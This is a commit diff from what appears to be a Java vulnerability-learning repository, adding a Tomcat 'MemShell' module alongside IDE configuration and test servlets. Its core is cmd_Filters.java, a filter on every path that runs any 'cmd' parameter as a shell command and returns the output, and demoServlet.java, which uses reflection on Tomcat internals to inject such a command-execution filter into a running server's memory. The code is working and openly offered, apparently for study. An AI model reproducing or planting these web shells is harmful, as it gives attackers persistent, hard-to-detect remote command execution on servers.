SummerSec
diff --git a/‎JavaLearnVulnerability.iml‎
Lines changed: 11 additions & 0 deletions b/‎JavaLearnVulnerability.iml‎
Lines changed: 11 additions & 0 deletions
diff --git a/‎MemShell/MemShell.iml‎
Lines changed: 44 additions & 0 deletions b/‎MemShell/MemShell.iml‎
Lines changed: 44 additions & 0 deletions
diff --git a/‎MemShell/src/memshell/tomcat/TestFilter.java‎
Lines changed: 30 additions & 0 deletions b/‎MemShell/src/memshell/tomcat/TestFilter.java‎
Lines changed: 30 additions & 0 deletions
diff --git a/‎MemShell/src/memshell/tomcat/TestServlet.java‎
Lines changed: 32 additions & 0 deletions b/‎MemShell/src/memshell/tomcat/TestServlet.java‎
Lines changed: 32 additions & 0 deletions
diff --git a/‎MemShell/src/memshell/tomcat/cmd_Filters.java‎
Lines changed: 53 additions & 0 deletions b/‎MemShell/src/memshell/tomcat/cmd_Filters.java‎
Lines changed: 53 additions & 0 deletions
diff --git a/‎MemShell/src/memshell/tomcat/demoServlet.java‎
Lines changed: 131 additions & 0 deletions b/‎MemShell/src/memshell/tomcat/demoServlet.java‎
Lines changed: 131 additions & 0 deletions
diff --git a/‎MemShell/web/WEB-INF/web.xml‎
Lines changed: 19 additions & 0 deletions b/‎MemShell/web/WEB-INF/web.xml‎
Lines changed: 19 additions & 0 deletions
diff --git a/‎Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/index.jsp‎
Lines changed: 0 additions & 7 deletions b/‎Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/index.jsp‎
Lines changed: 0 additions & 7 deletions
diff --git a/‎vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_30.xml‎ renamed to ‎vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_62.xml‎
Lines changed: 4 additions & 4 deletions b/‎vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_30.xml‎ renamed to ‎vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_62.xml‎
Lines changed: 4 additions & 4 deletions
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+  <component name="NewModuleRootManager" inherit-compiler-output="true">
+    <exclude-output />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+  <component name="FacetManager">
+    <facet type="web" name="Web">
+      <configuration>
+        <descriptors>
+          <deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/web/WEB-INF/web.xml" />
+        </descriptors>
+        <webroots>
+          <root url="file://$MODULE_DIR$/web" relative="/" />
+        </webroots>
+      </configuration>
+    </facet>
+  </component>
+  <component name="NewModuleRootManager">
+    <output url="file://$MODULE_DIR$/web/WEB-INF/classes" />
+    <output-test url="file://$MODULE_DIR$/web/WEB-INF/classes" />
+    <exclude-output />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="module-library">
+      <library>
+        <CLASSES>
+          <root url="jar://D:/Tomcat9/lib/servlet-api.jar!/" />
+        </CLASSES>
+        <JAVADOC />
+        <SOURCES />
+      </library>
+    </orderEntry>
+    <orderEntry type="module-library">
+      <library>
+        <CLASSES>
+          <root url="file://D:/Tomcat9/lib" />
+        </CLASSES>
+        <JAVADOC />
+        <SOURCES />
+        <jarDirectory url="file://D:/Tomcat9/lib" recursive="false" />
+      </library>
+    </orderEntry>
+  </component>
+</module>
@@ -0,0 +1,30 @@
+package memshell.tomcat;
+
+/**
+ * @ClassName: TestFilter
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/7/16 13:19
+ * @Version: v1.0.0
+ * @Description:
+ **/
+import javax.servlet.*;
+import java.io.IOException;
+
+public class TestFilter implements Filter {
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+        System.out.println("Filter init is ok!");
+    }
+
+    @Override
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        System.out.println("do Filter is ok!");
+        filterChain.doFilter(servletRequest,servletResponse);
+        System.out.println("do Filter after");
+    }
+
+    @Override
+    public void destroy() {}
+}
@@ -0,0 +1,32 @@
+package memshell.tomcat;
+
+/**
+ * @ClassName: TestSevlet
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/7/16 10:17
+ * @Version: v1.0.0
+ * @Description:
+ **/
+import javax.servlet.ServletException;
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+
+@WebServlet("/TestServlet")
+public class TestServlet extends HttpServlet {
+
+    @Override
+    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+//        super.doGet(req, resp);
+        resp.getWriter().write("my first servlet");
+    }
+
+    @Override
+    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+//        super.doPost(req, resp);
+    }
+}
@@ -0,0 +1,53 @@
+package memshell.tomcat;
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.util.Scanner;
+/**
+ * @ClassName: cmd_Filters
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/7/16 15:33
+ * @Version: v1.0.0
+ * @Description:
+ **/
+
+@WebFilter("/*")
+public class cmd_Filters implements Filter {
+    @Override
+    public void destroy() {
+    }
+
+    @Override
+    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws ServletException, IOException {
+        HttpServletRequest req = (HttpServletRequest) request;
+        HttpServletResponse resp = (HttpServletResponse) response;
+        if (req.getParameter("cmd") != null) {
+            boolean isLinux = true;
+            String osTyp = System.getProperty("os.name");
+            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+                isLinux = false;
+            }
+            String[] cmds = isLinux ? new String[]{"sh", "-c", req.getParameter("cmd")} : new String[]{"cmd.exe", "/c", req.getParameter("cmd")};
+            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+            Scanner s = new Scanner(in,charsetName).useDelimiter("\\A");
+            String output = s.hasNext() ? s.next() : "";
+            resp.getWriter().write(output);
+            resp.getWriter().flush();
+        }
+        chain.doFilter(request, response);
+    }
+
+    @Override
+    public void init(FilterConfig config) throws ServletException {
+
+    }
+
+}
@@ -0,0 +1,131 @@
+package memshell.tomcat;
+
+/**
+ * @ClassName: demoServlet
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/7/16 15:41
+ * @Version: v1.0.0
+ * @Description:
+ **/
+import org.apache.catalina.Context;
+import org.apache.catalina.core.ApplicationContext;
+import org.apache.catalina.core.ApplicationFilterConfig;
+import org.apache.catalina.core.StandardContext;
+import org.apache.tomcat.util.descriptor.web.FilterDef;
+import org.apache.tomcat.util.descriptor.web.FilterMap;
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+
+import java.util.Map;
+import java.util.Scanner;
+
+@WebServlet("/demoServlet")
+public class demoServlet extends HttpServlet {
+    @Override
+    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+
+
+//        org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+//        org.apache.catalina.webresources.StandardRoot standardroot = (org.apache.catalina.webresources.StandardRoot) webappClassLoaderBase.getResources();
+//        org.apache.catalina.core.StandardContext standardContext = (StandardContext) standardroot.getContext();
+//        该获取StandardContext测试报错
+        Field Configs = null;
+        Map filterConfigs;
+        try {
+            //这里是反射获取ApplicationContext的context，也就是standardContext
+            ServletContext servletContext = request.getSession().getServletContext();
+
+            Field appctx = servletContext.getClass().getDeclaredField("context");
+            appctx.setAccessible(true);
+            ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
+
+            Field stdctx = applicationContext.getClass().getDeclaredField("context");
+            stdctx.setAccessible(true);
+            StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
+
+
+
+            String FilterName = "cmd_Filter";
+            Configs = standardContext.getClass().getDeclaredField("filterConfigs");
+            Configs.setAccessible(true);
+            filterConfigs = (Map) Configs.get(standardContext);
+
+            if (filterConfigs.get(FilterName) == null){
+                Filter filter = new Filter() {
+
+                    @Override
+                    public void init(FilterConfig filterConfig) throws ServletException {
+
+                    }
+
+                    @Override
+                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+                        HttpServletRequest req = (HttpServletRequest) servletRequest;
+                        if (req.getParameter("cmd") != null){
+                            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+
+                            InputStream in = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
+//
+                            Scanner s = new Scanner(in,charsetName).useDelimiter("\\A");
+                            String output = s.hasNext() ? s.next() : "";
+                            servletResponse.getWriter().write(output);
+
+                            return;
+                        }
+                        filterChain.doFilter(servletRequest,servletResponse);
+                    }
+
+                    @Override
+                    public void destroy() {
+
+                    }
+                };
+                //反射获取FilterDef，设置filter名等参数后，调用addFilterDef将FilterDef添加
+                Class<?> FilterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef");
+                Constructor declaredConstructors = FilterDef.getDeclaredConstructor();
+                FilterDef o = (FilterDef)declaredConstructors.newInstance();
+                o.setFilter(filter);
+                o.setFilterName(FilterName);
+                o.setFilterClass(filter.getClass().getName());
+                standardContext.addFilterDef(o);
+                //反射获取FilterMap并且设置拦截路径，并调用addFilterMapBefore将FilterMap添加进去
+                Class<?> FilterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
+                Constructor<?> declaredConstructor = FilterMap.getDeclaredConstructor();
+                org.apache.tomcat.util.descriptor.web.FilterMap o1 = (FilterMap)declaredConstructor.newInstance();
+
+                o1.addURLPattern("/*");
+                o1.setFilterName(FilterName);
+                o1.setDispatcher(DispatcherType.REQUEST.name());
+                standardContext.addFilterMapBefore(o1);
+
+                //反射获取ApplicationFilterConfig，构造方法将 FilterDef传入后获取filterConfig后，将设置好的filterConfig添加进去
+                Class<?> ApplicationFilterConfig = Class.forName("org.apache.catalina.core.ApplicationFilterConfig");
+                Constructor<?> declaredConstructor1 = ApplicationFilterConfig.getDeclaredConstructor(Context.class,FilterDef.class);
+                declaredConstructor1.setAccessible(true);
+                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) declaredConstructor1.newInstance(standardContext,o);
+                filterConfigs.put(FilterName,filterConfig);
+                response.getWriter().write("suc of suc");
+
+
+            }
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+
+
+    }
+
+    @Override
+    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+        this.doPost(request, response);
+    }
+}
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
+         version="4.0">
+
+        <filter>
+            <filter-name>TestFilter</filter-name>
+            <filter-class>memshell.tomcat.TestFilter</filter-class>
+        </filter>
+    
+        <filter-mapping>
+            <filter-name>TestFilter</filter-name>
+            <url-pattern>/*</url-pattern>
+        </filter-mapping>
+
+    
+    
+</web-app>
@@ -1,10 +1,3 @@
-<%--
-  Created by Bearcat
-  User: Administrator
-  Date: 2018/10/15 0015
-  Time: 20:36
-  To change this template use File | Settings | File Templates.
---%>
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <html>
 <head>